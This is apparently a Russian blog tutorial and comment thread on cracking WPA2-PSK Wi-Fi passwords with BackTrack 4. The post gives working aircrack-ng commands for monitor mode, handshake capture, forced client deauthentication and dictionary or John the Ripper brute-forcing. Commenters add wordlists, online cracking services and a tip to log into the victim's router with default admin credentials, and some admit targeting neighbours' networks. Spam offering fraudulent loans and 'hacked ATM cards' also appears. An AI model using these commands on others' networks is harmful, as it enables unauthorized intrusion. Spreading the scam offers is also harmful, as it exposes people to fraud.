Взламываем WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper
Метки: Backtrack | Linux | tips | хакинг
Вторник, 3 марта 2009 г.
Просмотров: 209248
Подписаться на комментарии по RSS
Этапы взлома :
- Переводим интерфейс в "monitor mode"
- Находим сети защищенные с помощью WPA2 и Pre Shared Key
- Захватываем все пакеты
- Деавторизуем клиента, для захвата начального обмена пакетами.
- Взламываем ключ используя словари (или с помощью John The Ripper)
Я использовал карточку Dlink DWL-G122 (USB) во время написания данной статьи. В Backtrack4 данное устройство видно под именем wlan0.
Доставка грузов в Китай контейнерными перевозками является одним из самых надежных и недорогих способов перевозки. Обращайтесь к нам за подробностями.
Для начала переводим карту в режим "monitor mode" :
root@bt:~# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on <strong>mon0</strong>)
Сделано, и теперь мы можем использовать карту как mon0
Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :
root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting <span style="color: #0000ff;">for</span> beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Остановите airodump-ng и убедитесь что все необходимые файлы созданы
root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее... Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.
Первый метод основывается на списках/словарях. Большое количество данных файлов вы можете найти в интернете (например www.theargon.com), или вы можете сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, вы можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake.
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
Постовой
Надежные грузоперевозки по России: срочная доставка грузов в Екатеринбург. Разветвленная сеть филиалов.
Еще записи по теме
- Добавление подписи во все исходящие письма в Postfix
- 5 практических примеров для удаления директорий в Linux
- Получение списка всех записей публичного домена командой Nslookup
- DRAC - удаленное развертывание ОС
- Взламываем WEP, используя Backtrack 3
- Знакомство с Microsoft Desktop Player
- Небольшие советы: Увеличиваем доступный приложениям диапазон портов
Комментариев: 82
Как насчет использования EWSA от Elcomsoft для брута? Кто-нибудь пробовал его именно для этого случая? Как заимпортировать файлы для брута?
Не могу войти в BackTrack4 логин root вводиться а при попытке вводе пароля клава перестает работать, ни одна кнопка кроме Enter не работает, в итоге через 60 сек. меня выбрасывает заново вводить пароль или при вводе без пароля просто нажатием Enter аналогично выбрасывает и клава снова работает. Такая же ерунда при загрузке диска slitaz-aircrack-ng. Подскаите решение или как обойти эту проблему.
Спасибо за хорошую информацию! А как в BackTrack4 взламывать WEP ? Спасибо взарание!
P.S. Я использывал ZD1211rw(usb adapter) ---WPA2 работает!
кто подскажет,как создать словарь для взлома WPA,никак не могу подобрать ключ к точке.
заранее благодарю ,с уважением # semby # Spain.
вводишь где логин # root Enter
потом ,в пустой строке, там ничего не будет прописываться,всеравно пишешь #toor Enter
root@bt:~# startx Enter
Люди, подскажите есть ли пособие по "употреблению" BackTrack или подобных к ему дистрибутивам?
З.Ы. Очень хочу научиться юзать эту машину, помогите...
Простой вопрос - зачем взламывать точки? Не проще обратиться к психтерапевту?
Нет, не проще. В дискуссию вступать не буду, судя по вопросу это бесполезно.
airodump-ng как его остановить ?????
Ctrl+Z
Ctrl+C
кто может подсказать там где знак | root@bt:~# /pentest/password/jtr/john --stdout --incremental:all вот здесь | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap надо писать все вместе или раздельно ?
Alt+Ctrl+Del or Reset
kakoj slovar optimalnuj?
этот мануал для 2 вифи карт ?
НАрод вы долбаны и страдаете полной фигней так как взлом впа2 не возможен за исключением брута который будет длится годами, минимальная длина символов пароля для ацес поинта 26 прикинте количетво комбинаций с учетом букв вернего и нижнего регистра и еще цифр,вам лечится нада)))
1милион пасов в секунду. думаю ето не займет много времени
Лечится надо вам, а ВПА2 взламывается за 15 минут...
технологии пока незнаю. в сети уже должно было просачится.
to SanSarych Это тебе надо лечится. ВПА2 за 15 минут.... Гониш ты паря. пароль на WEP я открываю за 5 минут максимум, с WPA такое не пройдёт. Может ты скажешь, что и WiMax со своими протоколами - друшлаг?
а фигли тут думать? При 26 символах с учетом верхнего-нижнего регистров и цифр полный перебор по 1 млн. паролей в секунду займет около 9 месяцев. Лучше ёжика родите.
А учитывая то, что есть прошаренные люди, которые с помощью генератора случайных чисел задают нормальные пароли, например во все 63 символа с учетом верхнего и нижнего регистров да еще и с цифрами и вместо TKIP юзают AES... Мне жалко вас ребята...
Интересно, сколько вы будете например вот такой ключик подбирать: lEqiFRnG9KdXt2i1WpNYCNo56D2FxtUyKciEqz1QU1bqGFD0BB5en0SOveQIDpa
Лучше потратьте время с пользой.
о да. Это не прошареные люди, это любители гомосятины.
У меня такой вопрос, пароль не wpa2 а wpa, при сбрасывании авторизации не происходит хендшейк. Хелп ми ^^ Или для wpa используется другой алгоритм?
берем видюху с cuda и ,, перебираем пароли со скоростью 350 млн , в секунду
Ути какой умный... 350 млн. паролей в секунду? А что не миллиард?
Заходим на опенсорс проект по КУДЕ и видим что с четырьмя 295ми Джифорсами максимум 85 тысяч паролей в секунду...
т.е. все английские символы одного регистра плюс циферки - 1 год перебора
http://code.google.com/p/pyrit/
Это все конечно хорошо и правильно... с точки зрения теории и генеральной линии КПСС, но прошареных пользователей меньше, чем точек доступа, а длиннючие "случайные" пароли генерит программа, и в действительности это псевдо-случайный пароль. Учитывая же, что задача взлома точки доступа это в 90% поиск любой слабозащищенной точки или проверка своей на гнилость, то метод брутфорса себя оправдывает.
ЗЫ Есть люди не меняющие даже стандартный пароль по умолчанию, а вы про продвинутость.
ЗЗЫ Если у когото появится необходимость сломать защиту конкретной точки, то всегда есть и иные средства.
Привет всем! У меня не происходит хендшейк при сбросе авторизации. Сеть Wpa+WPA2 Personal Плиз хелп
Привет всем. У меня тоже нет хендшейка. WPA2. Кто-нибудь сталкивался?
Net handshake celj ne wpa2 a prostenjkaja WPA ocenj izvenjajusj za shrift
Spisok sovmestimostej wifi kart vrode proshjel.
надо быть полным параноиком или иметь инет по стопицот рублей за мегабайт, чтобы поставить такой пароль
надо сидеть и ждать пока клиент не сделает подключение я оставлял комп на сутки а то и больше в засаде иногда удавалось словить а когда и полный голяк так-что пыхтите это как повезёт почти также как и со словарём слова нет и всё впустую
08:25:42] 11083904 keys tested (373.46 k/s) Current passphrase: ~schwert~
Master Key : 05 D2 D2 64 82 BA D8 2D BE E6 64 37 AE 4D 87 8E
57 05 2D D7 EB A5 7D 3E 11 0E F6 BC F4 E8 30 7C
Transient Key : 6A 02 95 9B 9A A3 D3 AF E5 FE 47 D6 74 BF 25 C1
D5 D4 6F 23 35 4A 75 D5 32 1A 31 52 13 B3 C3 55
E8 2A 5C 5C D8 9C 44 3B 77 96 A1 70 A5 32 66 6F
E6 1C E6 89 75 5C 45 7B 05 4C 26 61 14 2C 2A 8E
EAPOL HMAC : 2C 14 DB 2B F4 8F F2 7A FD D0 6E C5 F5 2D BC DF
Passphrase not in dictionary вот такой мой ответ
Ребят, подскажите, через убунту свою (9.10 Kern....) не могу подцепиться к вайфаю на висте с защитой wap2.... пропадает значек вайфая вообще.. Если на висте создаю соединение без защиты, то спокойно цепляюсь (( В чем трабла кто подскажет?
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
как использовать эту команду в debian??? подскажите, пожалуйста
даже если меняю путь, то результата никакого...
Вопрос - фраза "[ WPA handshake: XX:XX:XX:XX:XX:XX" появляется и остаётся до конца сессии airodump-ng, или же её надо специально отлавливать?
Второй ? - что означают цифры "-0 1" в параметрах aireplay-ng?
Дело все в том, что aircrack-ng находит ключ WPA-PSK только тогда, когда он на 100% верен и совпадает с содержимым cap файла,даже если есть хоть малейшее отличие - ничего!!! не найдет, а перебирать брутом это мазохизм ) слишком долго, и за это время сети просто уже может не быть на месте, или ключ просто поменяют ))
так что надо это - Nvidia Tesla хотябы! чтобы иметь хоть какой нибудь шанс http://www.nvidia.ru/page/personal_computing.html На обычном PC смолать можно только очень слабые пароли и то если повезет
И еще - посмотрите ка здесь http://www.onlinepasswordgenerator.net/test-your-password.php сколько требуется чтобы сломать пасс чистым брутфорсом (не по словарю!) Удачи!
при вводу команды airmon-ng - пишет Run it as root - чего делать?
AMR, жжешь))
AMR, нужно позвать приятеля по имени Root, он тебе поможет )
Подскажите кто-нибудь как правильно в aircrack указать путь к словарю, где его лучше хранить и как называть. К примеру у меня словарь на диске D в папке dictionary под названием
Russian (Full).dic
Заранее мерси
Aircrack-ng 1.1
[00:00:00] 24 keys tested (805.32 k/s)
KEY FOUND! [ 77777777 ]
Master Key : 75 38 63 D8 61 97 29 E5 66 D5 C0 9F 6F 58 32 FF
43 C4 48 68 B8 43 D8 B0 45 57 29 A0 53 A9 6F 83
Transient Key : FD 82 A5 0E B5 CB 69 BA 5F 2C 19 E2 1B D5 C4 DB
4B 12 DF A8 1D 40 9D C9 33 3D 43 76 E5 2B 4E C7
5D CF 78 12 DE 63 5F A2 7D C1 EA CB 26 FA 05 C1
95 F9 0C B3 A5 94 DD 11 74 A9 3C EF 79 A8 98 65
EAPOL HMAC : DE 80 62 AD AD 9E 79 E7 D9 79 F4 D0 CF 65 02 EC
Система Ubuntu 10.10
У кого вылетает беда:
Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel -1
и после ругается на -1 порт сделайте следующее:
sudo wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
sudo tar -jxf compat-wireless-2010-10-16.tar.bz2
sudo cd compat-wireless-2010-10-16
sudo wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
sudo wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
sudo patch ./net/wireless/chan.c channel-negative-one-maxim.patch
sudo gedit scripts/update-initramfs
#*** В строке 13: KLIB=/lib/modules/2.6.31-wl/build
#*** Изменить на: KLIB=/lib/modules/$(uname -r)/build
sudo make //после можно и пообедать и покурить и т.п.
sudo make install //здесь тоже времени на перекур хватит
sudo make unload
sudo reboot
Этим самым патчатся дрова и все у вас будет замечательно...(источник http://ubuntuforums.org/showthread.php?t=1598930)
еще момент который не указал автор:
root@bt:~# airodump-ng mon0
процесс будет длится долго, как только появился STATION запускаем еще один терминал, и уже в нем выполняем:
aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
словарей скачал...где скачал уже забыл:(
вот словарь по тупым паролям
00000000
000000000
0000000000
00000000000
000000000000
11111111
111111111
1111111111
11111111111
22222222
222222222
2222222222
22222222222
33333333
333333333
3333333333
33333333333
44444444
444444444
4444444444
44444444444
55555555
555555555
5555555555
55555555555
66666666
666666666
6666666666
66666666666
77777777
777777777
7777777777
77777777777
88888888
888888888
8888888888
88888888888
99999999
999999999
9999999999
99999999999
12345678
123456789
1234567890
87654321
987654321
0987654321
11110000
22220000
33330000
55550000
qwertyui
qwerty123
qwerty12345
gfhjkm12345
gfhjkm123
password
password1
password123
password12345
эт для эксперемтов в случае моего взлома мне его и хватило
сохранте это в wap.lst и закинте в папку tmp
sudo aircrack-ng -w /tmp/wpa.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
Если вам улыбнулась удача и вы подсоединились, в свойсвах подключения смотрим на свой ип...ип точки доступа будет XX.XX.XX.1 в 99.9%
Теперь открываем браузер и пишем http://XX.XX.XX.1/ там вы попадете в настройку точки доступа,где вам потребуется ввести логин и пароль, и в 90% случаев логин\пароль заводские, как у делинка так и у асуса это admin admin...далее что позволит фантазия...
+1
процесс будет длится долго, как только появился STATION запускаем еще один терминал, и уже в нем выполняем:
aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
а насчет патча, так это только для твоего свистка, я для ralink 3071 тоже дрова собирал, blacklist, rmmod, modprobe
когда пишу
sudo aireplay-ng -0 1 -a (тут bssid точки доступа) -c (тут мак подключенного клиента) mon0
22:29:35 Waiting for beacon frame (BSSID: 00:**:**:**:**:**) on channel -1
22:29:35 mon0 is on channel -1, but the AP uses channel 11
Please specify an ESSID (-e).
как решить этот трабл? как я только не пытался всегда пишет что канал мон0 не совпадает с каналом АП
2 Sergey
твоя карточка должна встать на 11 канал(как и та точка, которую ты ломаешь):
iwconfig mon0 --channel 11
P.S. писал по памяти, если что iwconfig --help в помошь)
кстати, если handshake не отображается в airodump-ng во время сбора пакетов, это еще не значит, что его не было и он не захвачен.
лучше всего во время работы airodump-ng откройте wireshark и поставте фильтр по протоколу "eapol": как только появляются такие пакеты значит handshake захвачен.
После ввода:
,что нужно нажать?, чтобы ввести "акт насилия":
Возможно ли взламать wpa2-psk з помощю CommView for WiFi и aircrak ng
To serg:
Нащел как путь правильный показывать?
Всем:
куда надо закинуть словарь и как показывать его путь?
Спасибо
у меня на нет буке интегрированой карточки невидит((((
при вводу команды airmon-ng - пишет Run it as root - чего делать?
Помогите ЧАЙНИКУ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Вуаерист долбаный!!!!!!!!!!!!!Оставь людей в покое!!!!!!!!!!!!
шо?
Вручную собирать хендшейки геморно!
Проще взять besside-ng и оставить на пару часов.
В результате появятся три файлика:
besside.log - там essid и bssid пойманных хендшейков
wep.cap и wpa.cap - сами хендшейки соответственно для WEP и WPA сетей
Ну и потом, да, скормить это всё в aircrack-ng.
А ещё лучше с элементами мутации в виде privet, ghbdrn, privet2011, ghbdtn2011 и т.д.
Вообщем, составление словаря - процесс творческий и тольк от него зависит успешность подбора пароля.
А время потраченное на подобор зависит от производительности компа.
И вот тут можно не парить себе мозг а воспользоваться онлайн сервисом каким-нибудь, благо в инете такое добро есть и зачастую песплатно. Я пользуюсь двумя сайтами обычно:
http://wpa.darkircop.org/ - эффективность 9% - бесплатно
http://gpuhash.com/ - эффективность 20% - один словарь бесплатно и производительность 300 тысяч паролей в секунду.
Мне на домашнем компе удавалось максимум 2 тыс.паролей в секунду перебирать, а у меня надо сказать не такой уж слабый комп.
Если кто найдёт достойный сервис онлайн для перебора - кидайте в комменты, всем пригодится.
Удачи! ;)
I had got a desire to begin my firm, but I did not have enough of money to do this. Thank heaven my colleague recommended to utilize the home loans. So I received the bank loan and made real my desire.
Простите за глупый вопрос, но... Перебор длинной в несколько недель это конечно здорово. А если подойти к вопросу творчески, например настроить свой маршрутизатор на тот же канал, поставить тот же ESSID, выдав свою сеть за ломаемую. Если хозяин вафли слишком любопытен, но он наверняка поломится на дублирующую сеть со своим ключем. Дело за малым- нужно каким то образом заставить муршрутизатор запомнить вводимый в него ключик. Возможно ли это?
А если хозяин вафли не слишком любопытен, то можно простимулировать его любопытство aireplay-ем
Тут есть всё для того чтобы подобрать пароль к WIFI
http://wpa2.at.ua/forum/4-1-9#302
Дрзья подскажите ка экспортировать словарь в aircrack-ng
kto moshit mne date dlia thomson WPA-PSK WORDLIST
бля , а где можно скачать нормальные словари..??? подскажите пожалуйста..!!!
и в правду подскажите друзья где можно скачать нормальные словари больше интересует цифровые ну там например мобильные телефоны итд
http://bruteforce.3dn.ru/news/slovari_dlja_bruteforce/1-0-12 — здесь выложил более 15 различных словарей, на разных языках, разного вида, рзличных видов.
Хочу отправить пакеты деаутентификации через ту же прогу
aireplay-ng -0 5 -a "мак точки" -c "мак клиента подключенного" mon0 но выходит сообщение
Waiting for beacon frame (здесь мак точки) on channel -1
mon0 is on channel -1, but the AP uses channel 10
или такое
Waiting for beacon frame (здесь мак точки) on channel -1
No such BSSID available.
Please specify an ESSID (-e).
Do you recognize that it's high time to get the loans, which can make your dreams come true.
/page/vzlamyvaem-wpa2-psk-ispolzuja-backtrack-4-aircrack-ng-i-john-the-ripper#comment-128
Он просто не виден, вводи пасс и жмии ентер ты просто не видишь пасс ;)
после ввода
aireplay-ng -0 1 -a (тут bssid точки доступа) -c (тут мак подключенного клиента) mon0
пишет
Couldn't determine current channel for wlan1, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Master Key : 07 86 E4 86 7F 3A 25 3B 69 1B 28 69 09 35 21 7B
0E 9F C6 C7 3F D9 79 12 0D AF D7 80 13 8D 1D A2
Transient Key : 70 9B 02 47 E1 9E 5B 4E 47 28 19 0C 58 F9 79 DC
D5 01 F6 3E B0 EC A5 EB D1 E4 C4 CF 16 DF 57 A0
1F 30 52 CD 08 2A 8A 28 4D 4E 3A C5 3F 81 02 AF
A2 34 A0 C3 D7 E4 28 34 A7 C7 64 7F D2 C4 27 C4
EAPOL HMAC : 37 CF 9B 97 10 BD 09 36 C6 39 63 A8 AE F9 AC D4
какой пароль
Приветствую вас,
Г-н Духов выдавая кредиты.
Вы должны были Банку в связи с плохой кредит, или вы были обмануты, или, что более вероятно,
нужна бизнес-кредит, немедленно вернуться к заявлению о
Вашей финансовой свободы и счастья, чтобы обеспечить вашу информацию ниже.
Полные имена:
Страна:
Мобильный телефон:
Необходимое количество:
Продолжительность:
Ежемесячный доход:
Пол:
Род занятий:
Пишите нам: larrymarkloanfirm@hotmail.com
Только серьезные запросы.
Whit кредитора.
Помогите пожалуйста с поролем. плисссс....
Master Key : 8F 3D F8 DB 3C A1 A4 30 9B 9D F9 67 59 4D 02 FA
46 FB 74 BD 46 F4 B2 C9 A6 CA 4A 3F 2F 20 DA CE
Transient Key : 17 E6 4D 09 69 B0 51 65 6A 09 85 AB DE 89 F2 CA
F5 90 3B 74 A5 FD 0A 48 38 32 05 A0 F8 5A 46 2F
9F E2 02 38 FB 84 18 94 13 EA 43 2C A0 BC 6A B6
84 71 B4 E7 91 B6 09 C4 7C F3 2F 3E C1 8F 64 1F
EAPOL HMAC : CD 30 62 0F EC 3A 29 80 E6 D0 B0 76 D8 20 A1 90
СКИНТЕ НА МЫЛО ПОЖАЛУЙСТА uvladislava@pisem.net или сюда....
Заранее _-_ блогодарю!
немогу зарегистрировать эту программу, какой код активации??
привет всем.кто может подсказать,при использовании aicrack нахожу пороль от wpa2,но когда хочу войти в данную сеть через найденный пароль подключиться не могу.пароль типа неверный.что делать? может это программка в реале ничего не находит?
Не работает эта команда root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
ни в Backtrack4 ни в Backtrack5
говорит нет такого каталога
Взлом из словаря, подбирает пароли которые не работают, в одном и том же словаре выбирает каждый раз разные значения, при повторном запуске.)
Есть программа с автогенерацией словаря, очень гибкая настройка подбора, получилось на работе ею хакнуть вафлю - myfinet ru
Просто хочу поделиться немного моей
свидетельство, как я также получил взломанный банкомат
Карта, которая может вывести USD 10,000 каждый
день в любой банкомат загрузки все вокруг
мир. эта карта является реальной и законным
он работает так прекрасно для меня. это
E-mail компании, которые производят
карта: Вы можете добраться до них на один
этой карты, и ваша жизнь изменится
почта для связи
mrbrownhacker@hotmail.com
Всем привет. Существует новый способ изготовления наличные деньги, хотя это незаконно, но и умный и простой способ жизни большой. Я использовал, чтобы быть барак мальчик, пока я не стал готов, и решил изменить свою жизнь, так или друга. Я получил подходящее, чтобы зарегистрироваться для воинствующего амнистии через соединение, таким образом, взяв меня из страны для обучения в Соединенных Штатах в течение 2года. Чтобы вырезать Короче говоря, во время моего обучения я имел в виду несколько белых друзей, которые были выродки, а также эксперты в ATM ремонт, программирования и исполнения, которые учили меня различные советы и хитрости о нарушении в банкомате. с моей знания, полученные от моих белых друзей выродка, я был в состоянии подделать и программы карта пустой банкомат с помощью различных инструментов и программного обеспечения. У меня есть готовые запрограммированы карты ATM, или если вы хотите узнать, вы также можете связаться со мной. Это не афера. Я просто 24 и у меня есть деньги, у меня есть автомобиль, я живу в Африке и я путешествую по всему миру. я сделать мои вещи на низкий ключ, чтобы избежать подозрений. Некоторые из вас будут удивлены, почему я это продажа, если действительно я уже живет большая. Это потому, что это трудная задача сделать это самостоятельно, я не буду лгать тебе, это не легко взломать банкомат говорить больше, чтобы перепрограммировать карту в одиночку. Это займет дней, а иногда и недель. Некоторые из вас захотят готовый карту, чтобы избежать стресса делать это самостоятельно, и я не дают готовый карту из бесплатно, потому что я провел дней, пытаясь сделать его доступным для вас. напишите мне. mrbrownhacker@hotmail.com для получения дополнительной информации, объяснения и запросов. ПРИМЕЧАНИЕ: карта банкомата имеет некоторые ПИН, № зарегистрированный номер счета. Это не имеет предела для вывода и это безвестно. Вы можете собирать деньги с любого счета, просто набрав лица номер счета. так, свяжитесь со мной мою электронную почту: mrbrownhacker@hotmail.com
Подскажите! Поймали WPA HandShake и решили проверить на своем wifi, в словарь воткнули нужный пароль но при поиске нароль найден небыл! в чем может быть проблема?!
точнее не на своем вайфае а на соседском, ну мы пароль знаем их!
Стать богатым сегодня, и взять на себя риск превращения своего собственного life.Try и получить пустую карту банкомат сегодня из (MR Wandy) и быть в числе тех счастливчиков, которые получают выгоду от этой карты. Это ЗАПРОГРАММИРОВАННОЕ пустая карта ATM способна взломе любой банкомат, в любой точке мира. Я должен знать об этой пустой карты ATM, когда я искал работу в Интернете около месяца ago..It действительно изменил мою жизнь навсегда, и теперь я могу сказать, что я богат, потому что я живым свидетельством. Наименее деньги я получаю в день с этой карты составляет около $ 3,000.Every сейчас и потом я держать закачивать деньги на мой счет. Хотя это незаконно, не существует никакого риска быть пойманным, так как она была запрограммирована таким образом, что она не отслеживаться, а также имеет технику, что делает невозможным для видеонаблюдения, чтобы обнаружить you..For подробную информацию о том, как получить ваш сегодня, по электронной почте хакеров на: wandyhackersworld88@gmail.com
Доброго времени суток. Проводил дома аудит безопасности соседских беспроводных сетей,
Стибрил хендшейк: *hz_network-0.cap**.
Делаю, значит:
aircrack-ng -w rc.txt hs/hz_network-0*.cap
Через пару минут . оно мне:
Passphrase not in dictionary 0
При том что словарь ~100Mib а комп не слабый.. Другие словари(почти все, как большего, так и меньшего объема работают)
Думал че не так с кодировкой: сделал?Может проблема в словаре ?кто нибудь поможет.я по инструкции создавал словарь любое но постоянно такое при взломе.